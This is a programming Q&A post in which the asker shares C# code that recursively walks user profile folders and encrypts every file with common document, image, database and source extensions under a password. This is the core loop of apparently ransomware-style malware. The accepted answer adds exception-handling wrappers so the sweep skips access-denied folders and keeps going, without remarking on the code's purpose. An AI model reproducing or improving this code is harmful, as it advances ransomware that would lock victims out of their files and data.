# ignore "Unauthorized Access" " function Directory.GetDirectories()"

Tags: c#, directory, unauthorized

When I scan The Directory in `C:\\users\\<SomeUserName>\\*`
In some Directory i have no access i search a lot how to ignore "Unauthorized Access"
Now i need Help :/

Here is my code:

```
public void encryptDirectory(string location, string password)
{
    //extensions to be encrypt
    var validExtensions = new[]
    {
        ".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"
    };
    string[] files = Directory.GetFiles(location);
    string[] childDirectories = Directory.GetDirectories(location);
    for (int i = 0; i < files.Length; i++)
    {
        string extension = Path.GetExtension(files[i]);
        if (validExtensions.Contains(extension))
        {
            EncryptFile(files[i], password);
        }
    }
    for (int i = 0; i < childDirectories.Length; i++)
    {
        encryptDirectory(childDirectories[i], password);
    }
}
```

Answer (score 0, accepted):

If you would like to ignore exceptions thrown by a particular method, write your own wrapper, catch the exception you wish to trap, and return some useful default value:

```
private static string[] GetFilesSafe(string location) {
    try {
        return Directory.GetFiles(location);
    } catch (UnauthorizedAccessException ex) {
        Console.Error.WriteLine(ex.Message);
        return new string[0];
    }
}
```

Write a similar wrapper for `Directory.GetDirectories`, and replace direct calls with calls to wrappers. This will hide the access problem.